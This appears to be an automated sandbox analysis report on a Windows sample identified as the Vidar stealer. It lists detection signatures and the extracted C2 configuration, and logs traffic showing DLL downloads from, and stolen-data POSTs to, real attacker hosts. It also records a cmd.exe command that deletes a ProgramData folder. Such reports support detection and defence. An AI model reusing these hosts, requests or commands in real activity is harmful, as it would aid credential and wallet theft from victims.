Windows Analysis Report
out.exe

Overview

General Information

Sample name: out.exe
Analysis ID: 1528360
MD5: 7a2f8827805aba605ac201a9f0c2cb03
SHA1: f1e15c229cf82f17d5f98cc6ad29247446bf54ca
SHA256: 0781a4d72a9f35f27a6608e0e5ec8afbf3ee1e39c656b6e5f0582b60d34fa018
Tags: exe user-N3utralZ0ne

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
PE file has a writeable .text section
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • out.exe (PID: 1396 cmdline: "C:\Users\user\Desktop\out.exe" MD5: 7A2F8827805ABA605AC201A9F0C2CB03)
    • cmd.exe (PID: 7132 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKEBFHIJECFI" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 3656 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup
{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "744fd163d6d4e0ac37e4032bcbfbb6af"}
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| out.exe | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| out.exe | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | |
| out.exe | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| sslproxydump.pcap | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| sslproxydump.pcap | JoeSecurity_Vidar_2 | Yara detected Vidar | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 00000000.00000000.2039473209.0000000000050000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| 00000000.00000000.2039473209.0000000000050000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security | |
| 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security | |
| Process Memory Space: out.exe PID: 1396 | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |

| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| 0.2.out.exe.20000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| 0.2.out.exe.20000.0.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security | |
| 0.0.out.exe.20000.0.unpack | JoeSecurity_Vidar_1 | Yara detected Vidar stealer | Joe Security | |
| 0.0.out.exe.20000.0.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security | |

No Sigma rule has matched
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-07T20:35:21.007155+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49752 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:22.166238+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49763 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:23.734166+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49774 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:25.030726+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49782 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:26.384044+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49791 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:27.795548+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49802 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:28.802525+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49810 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:31.697871+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49831 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:32.861245+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49839 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:34.359756+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49851 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:35.854422+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49860 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:37.780067+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49875 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:39.358579+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49887 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:41.113143+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49899 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:43.163643+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49913 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:44.613860+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49924 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:47.991700+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49946 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:49.382271+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49953 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:50.698257+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49963 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:52.212160+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49974 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:54.353536+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49988 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:56.383056+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49998 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:57.702528+0200 | 2028765 | 3 | Unknown Traffic | 192.168.2.5 | 49999 | 49.12.106.214 | 443 | TCP |
| 2024-10-07T20:35:59.176328+0200 | 2054495 | 1 | A Network Trojan was detected | 192.168.2.5 | 50000 | 45.132.206.251 | 80 | TCP |
| 2024-10-07T20:35:25.704302+0200 | 2044247 | 1 | Malware Command and Control Activity Detected | 49.12.106.214 | 443 | 192.168.2.5 | 49782 | TCP |
| 2024-10-07T20:35:27.078262+0200 | 2051831 | 1 | Malware Command and Control Activity Detected | 49.12.106.214 | 443 | 192.168.2.5 | 49791 | TCP |
| 2024-10-07T20:35:24.405392+0200 | 2049087 | 1 | A Network Trojan was detected | 192.168.2.5 | 49774 | 49.12.106.214 | 443 | TCP |


AV Detection

Source: https://t.me/ae5ed, URL Reputation: Label: malware
Source: out.exe, Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "744fd163d6d4e0ac37e4032bcbfbb6af"}
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: out.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\out.exe, Code function: 0_2_000280A1 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\out.exe, Code function: 0_2_00028048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\out.exe, Code function: 0_2_00031E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA
Source: C:\Users\user\Desktop\out.exe, Code function: 0_2_0002A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA
Source: C:\Users\user\Desktop\out.exe, Code function: 0_2_6C426C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer

Compliance

Source: C:\Users\user\Desktop\out.exe, Unpacked PE file: 0.2.out.exe.27650000.3.unpack
Source: out.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 49.12.106.214:443 -> 192.168.2.5:49752 version: TLS 1.2
                              Source: Binary string: freebl3.pdb source: out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
                              Source: Binary string: mozglue.pdbP source: out.exe, 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.dr
                              Source: Binary string: freebl3.pdbp source: out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
                              Source: Binary string: nss3.pdb@ source: out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
                              Source: Binary string: softokn3.pdb@ source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
                              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: out.exe, 00000000.00000002.2695905232.0000000049DE1000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.0.dr
                              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: out.exe, 00000000.00000002.2690538362.000000003DF10000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.0.dr
                              Source: Binary string: nss3.pdb source: out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
                              Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: out.exe, 00000000.00000003.2392913103.000000000303A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2393034605.000000000303D000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2681976750.0000000027868000.00000002.00001000.00020000.00000000.sdmp, out.exe, 00000000.00000002.2682330461.0000000029D9E000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: mozglue.pdb source: out.exe, 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.dr
                              Source: Binary string: softokn3.pdb source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\out.exe, Code function: 0_2_0003543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\out.exe, Code function: 0_2_00034CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\out.exe, Code function: 0_2_00029D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\out.exe, Code function: 0_2_00021D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\out.exe, Code function: 0_2_0002D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\out.exe, Code function: 0_2_0002B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\out.exe, Code function: 0_2_0002BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\out.exe, Code function: 0_2_00035FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\out.exe, Code function: 0_2_0002B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\out.exe, Code function: 0_2_00035B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA
Source: C:\Users\user\Desktop\out.exe, Code function: 0_2_0002CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\out.exe, Code function: 0_2_00035142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA
Source: C:\Users\user\Desktop\out.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\out.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\out.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\out.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\out.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\out.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\out.exe, Code function: 4x nop then mov eax, dword ptr fs:[00000030h] (0_2_000214AD)
Source: C:\Users\user\Desktop\out.exe, Code function: 4x nop then mov dword ptr [ebp-04h], eax (0_2_000214AD)

Networking

Source: Network traffic, Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.5:50000 -> 45.132.206.251:80
Source: Network traffic, Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.5:49774 -> 49.12.106.214:443
Source: Network traffic, Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.106.214:443 -> 192.168.2.5:49791
Source: Network traffic, Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.106.214:443 -> 192.168.2.5:49782
Source: Malware configuration extractor, URLs: https://steamcommunity.com/profiles/76561199780418869
Source: global traffic, HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1 | Host: steamcommunity.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View, IP Address: 104.102.49.254
Source: Joe Sandbox View, IP Address: 45.132.206.251
Source: Joe Sandbox View, ASN Name: HETZNER-ASDE
Source: Joe Sandbox View, ASN Name: AKAMAI-ASUS
Source: Joe Sandbox View, ASN Name: LIFELINK-ASRU
Source: Joe Sandbox View, JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic, Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5 -> 49.12.106.214:443, 23 alerts, one per source port: 49802, 49810, 49791, 49752, 49782, 49774, 49763, 49831, 49839, 49851, 49860, 49875, 49887, 49899, 49924, 49913, 49946, 49953, 49963, 49988, 49998, 49974, 49999
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJEHIJEBKEBFBFHIIDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEGDBGDBFIJKECBAKFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKEGCAEGIIJKFIEHIJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 5801Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJEGDGIJECGCBGCGHDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.106.214 Connection: Keep-Alive Cache-Control: no-cache
                              Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.106.214 Connection: Keep-Alive Cache-Control: no-cache
                              Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.106.214 Connection: Keep-Alive Cache-Control: no-cache
                              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKJEGDGIJECGCBGCGHDG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.106.214 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
                              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIEBGIDAAFHIJJJJEGCG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.106.214 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDHJEBFBFHJECAKFCAAK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.106.214 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKEGCAEGIIJKFIEHIJE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.106.214 Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache
                              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.106.214 Content-Length: 114269 Connection: Keep-Alive Cache-Control: no-cache
                              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIEGHJEGHJKFIEBFHJKK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.106.214 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.106.214 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                              Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: cowod.hopto.org Content-Length: 3193 Connection: Keep-Alive Cache-Control: no-cache
                              Source: unknown TCP traffic detected without corresponding DNS query: 49.12.106.214
                              Source: C:\Users\user\Desktop\out.exe Code function: 0_2_00026963 InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile, InternetCloseHandle, InternetCloseHandle, InternetCloseHandle, 0_2_00026963
                              Source: global traffic HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
                              Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.106.214 Connection: Keep-Alive Cache-Control: no-cache
                              Source: global traffic HTTP traffic detected: GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.106.214 Connection: Keep-Alive Cache-Control: no-cache
